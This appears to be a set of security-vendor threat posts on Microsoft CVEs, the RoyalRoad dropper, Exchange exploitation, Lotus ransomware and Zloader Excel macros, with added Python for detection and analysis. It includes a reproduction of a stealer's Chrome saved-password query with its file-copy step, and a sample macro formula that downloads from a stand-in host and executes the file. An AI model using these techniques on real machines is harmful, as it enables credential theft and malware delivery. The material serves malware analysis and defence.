CVE-2021-27055 Microsoft Visio Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27056 Microsoft PowerPoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27057 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27058 Microsoft Office ClickToRun Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27059 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27060 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27061 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27062 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27063 Windows DNS Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-27066 Windows Admin Center Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-27070 Windows 10 Update Assistant Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-27074 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27075 Azure Virtual Machine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27080 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27081 Visual Studio Code ESLint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27082 Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27083 Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27084 Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27085 Internet Explorer Remote Code Execution Vulnerability
There are no known exploits in the wild.

8t_Dropper, RoyalRoad

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample of 8t_Dropper, also known as RoyalRoad. RoyalRoad is a tool shared by many targeted attack groups believed to be based in China. The sample analysed below harvests stored passwords by running SQL queries against the local credential databases of the installed browsers and mail clients (Google Chrome, Firefox, Thunderbird).

Threat Actor(s) Involved: Hellsing, Ice Fog, Pirate Panda, RANCOR, TA428, Tick, Tonto Team, Karma Panda

MITRE ATT&CK Information:

ID: T1055
Sub-techniques: T1055.001, T1055.002, T1055.003, T1055.004, T1055.005, T1055.008, T1055.009, T1055.011, T1055.012, T1055.013, T1055.014
Tactics: Defense Evasion, Privilege Escalation
Platforms: Linux, Windows, macOS
Data Sources: API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Defense Bypassed: Anti-virus, Application control
CAPEC ID: CAPEC-640

Sample, Static Information:

Checking for a valid PE file: red highlights appear within each PE member in which invalid data is found. This sample passes the check.

Entropy of sample:

First Stage, Dropper, Dynamic Information:

A list of the shellcode's function calls, disassembled in IDA Pro:

The Call+5 trick (a call to the very next instruction, so that the return address pushed on the stack reveals the shellcode's own location), commonly used in malware, disassembled:

Shellcode function calls disassembled in x32dbg:

Encrypted Buffer:

Decrypted Buffer:

Dropped DLL:

Encryption used in DLL:

NSS Info:

NSS Overview:

NSS Decompiled:

SQL Functions Decompiled:

(SQL Query) – Thunderbird Password Captures:

(SQL Query) – Google Chrome Password Captures:
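The Chrome query referenced in the caption above reads the `logins` table of the profile's Login Data SQLite file. The following is an added example reproducing that read against a constructed copy of the database, not the malware's code. The table is a trimmed version of Chrome's real `logins` schema (only the columns the query touches plus a few common ones) and the rows are constructed. Two facts the example relies on: modern Chrome on Windows stores password_value as an AES-256-GCM blob prefixed "v10" whose key sits DPAPI-protected in the profile's Local State, so the query alone yields ciphertext, while older profiles hold raw DPAPI blobs; and Chrome keeps the live file locked, which is why stealers copy it first.

```python
"""What the "Google Chrome Password Captures" query reads, run against a
constructed copy of Chrome's Login Data SQLite database.

Added example, not the malware's code. LOGINS_DDL is a trimmed version of
Chrome's real `logins` schema; the rows are constructed and the blobs are
dummy bytes laid out like the real "v10" (AES-GCM) and DPAPI formats.
"""
import os
import shutil
import sqlite3
import tempfile

LOGINS_DDL = """CREATE TABLE logins (
    origin_url VARCHAR NOT NULL,
    action_url VARCHAR,
    username_element VARCHAR,
    username_value VARCHAR,
    password_element VARCHAR,
    password_value BLOB,
    date_created INTEGER NOT NULL,
    blacklisted_by_user INTEGER NOT NULL)"""
# The query a credential stealer runs; it needs no join and no decryption key.
STEALER_QUERY = "SELECT origin_url, username_value, password_value FROM logins"

SAMPLE_ROWS = [  # constructed
    ("https://mail.example.test/", "https://mail.example.test/login", "user", "alice",
     "pass", b"v10" + b"\x00" * 12 + b"\xde\xad\xbe\xef", 13250000000000000, 0),
    ("https://intranet.example.test/", "", "login", "bob",
     "pwd", b"\x01\x00\x00\x00\xd0\x8c\x9d\xdf", 13250000000000000, 0),
]


def build_sample_login_data(path):
    """Create a Login Data file with the trimmed schema and constructed rows."""
    con = sqlite3.connect(path)
    con.execute(LOGINS_DDL)
    con.executemany("INSERT INTO logins VALUES (?,?,?,?,?,?,?,?)", SAMPLE_ROWS)
    con.commit()
    con.close()


def harvest_logins(login_data_path):
    """Run the stealer's query on a copy of the DB and classify each password blob."""
    workdir = tempfile.mkdtemp()
    try:
        copy = os.path.join(workdir, "Login Data")
        shutil.copyfile(login_data_path, copy)  # sidestep Chrome's lock on the live file
        con = sqlite3.connect(copy)
        out = []
        for origin, user, blob in con.execute(STEALER_QUERY):
            # "v10" prefix: AES-256-GCM, key is DPAPI-wrapped in Local State.
            # Otherwise: a raw DPAPI blob (magic 01 00 00 00 D0 8C 9D DF).
            scheme = "aes-gcm/v10 (needs Local State key)" if blob.startswith(b"v10") else "dpapi"
            out.append({"origin": origin, "username": user, "scheme": scheme, "blob_len": len(blob)})
        con.close()
        return out
    finally:
        shutil.rmtree(workdir)


def demo():
    """Build a sample DB in a temp dir, harvest it, and return the rows."""
    workdir = tempfile.mkdtemp()
    try:
        path = os.path.join(workdir, "Login Data")
        build_sample_login_data(path)
        return harvest_logins(path)
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    for row in demo():
        print(row)
```

From the defender's side the useful signal is the copy step: a non-browser process opening or copying a file named Login Data, and the same process reading Local State alongside it, is a far narrower detection than watching sqlite3 activity in general.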

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: 8t_Dropper.A (Trojan)

Appendix:

Sample SHA256 Hash: 859443a72a9a9f53e3810efbddc79c68a243fcba0c52957c0a37846384477133

CRITICAL REMOTE CODE EXECUTION FLAWS IN MICROSOFT EXCHANGE ARE BEING ACTIVELY EXPLOITED

The SonicWall Capture Labs Threat Research team has received reports that threat actors are actively exploiting the following Microsoft Exchange vulnerabilities:

  • CVE-2021-26855
  • CVE-2021-26857
  • CVE-2021-26858
  • CVE-2021-27065

These vulnerabilities give attackers access to email stored on the Exchange servers, which may include sensitive or personal data.

Affected Products:

Microsoft Exchange Server 2013, 2016 and 2019 are affected by these vulnerabilities. Users should apply the updates as soon as possible.  Microsoft has also released a “Defense in Depth” update for Exchange Server 2010.

On March 2, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

IPS: 15418 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution (CVE-2021-26857)
IPS: 15419 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution ( CVE-2021-26855) 1
IPS: 15420 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution ( CVE-2021-26855) 2
IPS: 15421 WEB-ATTACKS Microsoft Exchange Server Remote Code Execution 1

It is also recommended that DPI-SSL be enabled.  The following articles describe how to configure DPI-SSL:
https://www.sonicwall.com/support/knowledge-base/how-can-i-configure-client-dpi-ssl/170505885674291/
https://www.sonicwall.com/support/knowledge-base/how-to-configure-server-dpi-ssl/170505900099021/

Lotus ransomware charges 1 BTC ($49K USD). Multi PC discount possible

The SonicWall Capture Labs threat research team has observed reports of a variant from the Crysis/Dharma ransomware family called Lotus.  The operators of this malware charge 1 BTC ($49K USD at the time of writing this alert) for file recovery.  However, the price appears to be negotiable after a conversation with the malware operator.

 

Infection Cycle:

 

Upon infection, the malware can be seen using the built-in mshta program to display the ransom message:

 

Files on the system are encrypted and the following extension is appended to their file names:

.id-E625BDD2.[paymei@cock.li].LOTUS

 

The following ransom message is displayed on the desktop:

 

The following files are dropped on to the system:

  • MANUAL.txt (in every directory containing encrypted files)
  • %APPDATA%\Roaming\{original malware file name} [Detected as: GAV: Lotus.RSM (Trojan)]
  • %APPDATA%\Roaming\Info.hta (contains message shown above)
  • %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta (contains message shown above)
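The renamed files and the dropped notes above give a responder enough to inventory an infection without any sample in hand: the extension carries a per-victim ID and the operator's contact address, and Info.hta in the Startup folder is the persistence of the ransom screen. The following is an added example of that triage, not SonicWall's signature. The paths in it are constructed; only the extension format .id-<8 hex>.[<email>].LOTUS and the note names MANUAL.txt and Info.hta come from the post.

```python
"""Triage file names for Crysis/Dharma-style encryption markers and ransom
notes, using the Lotus naming shown above.

Added example, not SonicWall's signature. The paths are constructed; only
the extension format .id-<8 hex>.[<email>].LOTUS and the note file names
MANUAL.txt / Info.hta come from the post.
"""
import re

# <name>.id-XXXXXXXX.[contact@mail].EXT  (Crysis/Dharma family convention)
DHARMA_EXT = re.compile(
    r"\.id-(?P<victim_id>[0-9A-Fa-f]{8})\.\[(?P<contact>[^\]\s]+@[^\]\s]+)\]\.(?P<ext>[A-Za-z0-9]+)$")
NOTE_NAMES = {"manual.txt", "info.hta"}
STARTUP_DIR = r"\microsoft\windows\start menu\programs\startup"

SAMPLE_PATHS = [  # constructed
    r"C:\Users\bob\Documents\budget.xlsx.id-E625BDD2.[paymei@cock.li].LOTUS",
    r"C:\Users\bob\Pictures\holiday.jpg.id-E625BDD2.[paymei@cock.li].LOTUS",
    r"C:\Users\bob\Documents\MANUAL.txt",
    r"C:\Users\bob\AppData\Roaming\Info.hta",
    r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta",
    r"C:\Users\bob\Documents\notes.txt",
]


def classify(path):
    """Label one path as encrypted file, ransom note, or clean."""
    name = path.rsplit("\\", 1)[-1]
    m = DHARMA_EXT.search(name)
    if m:
        return {"kind": "encrypted", **m.groupdict()}
    if name.lower() in NOTE_NAMES:
        parent = path[: -len(name)].lower().rstrip("\\")
        return {"kind": "note", "persistence": parent.endswith(STARTUP_DIR)}
    return {"kind": "clean"}


def summarize(paths):
    """Aggregate what a responder wants at a glance: counts, IDs, contacts, persistence."""
    summary = {"encrypted": 0, "victim_ids": set(), "contacts": set(),
               "extensions": set(), "notes": 0, "startup_persistence": False}
    for p in paths:
        c = classify(p)
        if c["kind"] == "encrypted":
            summary["encrypted"] += 1
            summary["victim_ids"].add(c["victim_id"].upper())
            summary["contacts"].add(c["contact"])
            summary["extensions"].add(c["ext"])
        elif c["kind"] == "note":
            summary["notes"] += 1
            summary["startup_persistence"] |= c["persistence"]
    return summary


if __name__ == "__main__":
    print(summarize(SAMPLE_PATHS))
```

Running this over a file listing from each affected host groups machines by victim ID, which is the number the operator asks for when negotiating per PC.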

 

MANUAL.txt contains the following text:

 

We reached out to the supplied emails and had the following conversation with the ransomware operator:

 

The operator asks how many PCs we would like to recover. This leads us to believe that the malware is aimed at large organizations:

 

We check whether the price can be negotiated further when multiple PCs are infected:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Lotus.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Excel with misleading macrosheet name spreading Zloader

SonicWall Capture Labs Threat Research team has been observing changes in the techniques used to distribute ZLoader via MS-Excel files. It began around January 2020, when the first campaign was seen using XLM macros instead of the more common VBA macros. Since then, we have observed significant refinements, such as evasion and sandbox-bypass techniques implemented in the XLM macro, as described in our previous blog.

This variant is an OOXML-format Excel file. In OOXML workbooks, XLM macro sheets are normally stored inside the “macrosheets” folder and named either “Sheet<digit>.xml” or “intlsheet<digit>.xml”. This variant instead stores the macro sheet in a folder named “bioxr” under the file name “foto.png”, as shown in the image below:


Fig-1: XLM MacroSheet

Engines that look for macro sheets only inside the “macrosheets” folder may fail to identify these files as XLM macro files. Careful inspection of the “workbook.xml.rels” file shows that both the folder and the file name of the macro sheet are misleading, as shown below:


Fig-2: workbook.xml.rels

Sample Analysis:

Upon opening the file, the user is displayed instructions to enable macro as shown below:


Fig-3: Excel File

The sample contains two sheets, one of which is a hidden macro sheet. It has a defined name “Aut0_Open”, which triggers macro execution as soon as the file is opened. The font size in the sheet is set to 2 to make the content hard to read.


Fig-4: hidden macro sheet
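The robust way to find a macro sheet is the one the post's inspection of workbook.xml.rels hints at: ignore folder and file names and go by the relationship type (xlMacrosheet) and the declared content type, then cross-reference the sheet's hidden state and any Auto_Open defined name from workbook.xml. The following is an added example of that detector, not SonicWall's engine. build_sample_xlsx() assembles a minimal constructed workbook that mirrors the post (macro part at xl/bioxr/foto.png, hidden sheet, defined name "Aut0_Open"); the sheet name "Macro1", the cell formulas and the omission of package-level parts such as _rels/.rels are assumptions. The Auto_Open check normalises "0" to "o" so the spelling shown in the post is caught; that normalisation is a heuristic of this example.

```python
"""Locate XLM (Excel 4.0) macro sheets in an OOXML workbook by relationship
type and content type rather than by folder name, so a sheet stored as
bioxr/foto.png is still found; report hidden state and Auto_Open names.

Added example, not SonicWall's detection engine. build_sample_xlsx()
assembles a minimal constructed workbook mirroring the post; the sheet
name, the cell formulas and the omitted package-level parts are assumptions.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
MACROSHEET_REL = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"


def build_sample_xlsx():
    """Return the bytes of a constructed workbook with a disguised macro sheet."""
    content_types = f"""<Types xmlns="{CT_NS}">
  <Default Extension="xml" ContentType="application/xml"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>
  <Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
  <Override PartName="/xl/bioxr/foto.png" ContentType="{MACROSHEET_CT}"/>
</Types>"""
    workbook = f"""<workbook xmlns="{MAIN_NS}" xmlns:r="{R_NS}">
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Macro1" sheetId="2" state="hidden" r:id="rId2"/>
  </sheets>
  <definedNames><definedName name="Aut0_Open">Macro1!$A$1</definedName></definedNames>
</workbook>"""
    rels = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{R_NS}/worksheet" Target="worksheets/sheet1.xml"/>
  <Relationship Id="rId2" Type="{MACROSHEET_REL}" Target="bioxr/foto.png"/>
</Relationships>"""
    sheet1 = f'<worksheet xmlns="{MAIN_NS}"><sheetData/></worksheet>'
    macrosheet = f"""<macrosheet xmlns="{MAIN_NS}"><sheetData>
  <row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/x","C:\\a\\b\\ServApi.exe",0,0)</f></c></row>
  <row r="2"><c r="A2"><f>EXEC("C:\\a\\b\\ServApi.exe")</f></c></row>
  <row r="3"><c r="A3"><f>HALT()</f></c></row>
</sheetData></macrosheet>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
        z.writestr("xl/worksheets/sheet1.xml", sheet1)
        z.writestr("xl/bioxr/foto.png", macrosheet)
    return buf.getvalue()


def _resolve(target):
    """Relationship targets are relative to xl/ unless they start with '/'."""
    return target.lstrip("/") if target.startswith("/") else "xl/" + target


def is_auto_open(name):
    """Auto_Open and near-homoglyph spellings such as Aut0_Open (heuristic)."""
    return re.match(r"auto_?open", name.lower().replace("0", "o")) is not None


def find_xlm_macros(xlsx_bytes):
    """Report every macro sheet part, its sheet name/state, formulas and Auto_Open names."""
    z = zipfile.ZipFile(io.BytesIO(xlsx_bytes))
    rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    macro_parts = {r.get("Id"): _resolve(r.get("Target"))
                   for r in rels.iter("{%s}Relationship" % REL_NS) if r.get("Type") == MACROSHEET_REL}
    ct = ET.fromstring(z.read("[Content_Types].xml"))
    ct_parts = {o.get("PartName").lstrip("/") for o in ct.iter("{%s}Override" % CT_NS)
                if o.get("ContentType") == MACROSHEET_CT}
    wb = ET.fromstring(z.read("xl/workbook.xml"))
    sheets = {s.get("{%s}id" % R_NS): (s.get("name"), s.get("state", "visible"))
              for s in wb.iter("{%s}sheet" % MAIN_NS)}
    auto_open = [d.get("name") for d in wb.iter("{%s}definedName" % MAIN_NS)
                 if is_auto_open(d.get("name", ""))]
    report = []
    for rid, part in macro_parts.items():
        name, state = sheets.get(rid, (None, None))
        formulas = [f.text for f in ET.fromstring(z.read(part)).iter("{%s}f" % MAIN_NS)]
        report.append({"part": part, "sheet": name, "state": state,
                       "in_macrosheets_dir": part.startswith("xl/macrosheets/"),
                       "content_type_declared": part in ct_parts, "formulas": formulas})
    return {"macrosheets": report, "auto_open_names": auto_open}


if __name__ == "__main__":
    print(find_xlm_macros(build_sample_xlsx()))
```

A part that is reachable through an xlMacrosheet relationship but sits outside xl/macrosheets/, or is hidden, or is bound to an Auto_Open name, is a strong indicator on its own; all three together is the profile of this campaign.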

When the XLM macro runs, a payload belonging to the Zloader family is downloaded and saved as C:\<random>\<random>\ServApi.exe.

SonicWall Capture ATP protects against this threat as shown below:


Fig-5: Capture Report

 

Indicators of Compromise:

SHA256 of malicious Excel Files:

  • 12047db782ec585e6c577248607f504869d166077ee33a4d455a66370ea6f9b4
  • 189735e1fde7511cd9cedfb317f544971411691192c25ca36147998e492753d7
  • 18d1cc06d96c741e0c21c1ceea194f37ca5941264cc0a26d89cba8e09c132485
  • 18e6f2976642ca37a4e81358ea8da608b5d34a50b1954d0c3041e902ae23e192
  • 18f33627843309fdef93e7edc7c24c856912d19a9622c2647165247e1aa16386
  • 1a03a110254fe594cb08e5db44b5dd7d00ebedf5bf6944e2aff7807195b7bff6
  • 1b29453e458e36c8b8b17371d4cb254a7cea4f1b035dc2d308e75ca1829766f3
  • 20af190130ad3ac40a01df57341929d968616ef717bc9e691308ccaf4f41a683
  • 211eb2bbaf1e1dcadd3f10c6c77ff2243f8690b1cd9f9dd5218d48d1b4edd02e
  • 224b3303d4f32bc71fa3322d9385d004293459ed74885179178d04c880dbf6f8
  • 2335e54b766bf5dc2a9078b995a4878ff350aa39d83ef7eabe77433c5c26e998

Network Connection:

  • safedot[.]digital
    • Domain registered on 25-Feb-2021

Files:

  • C:\<random>\<random>\ServApi.exe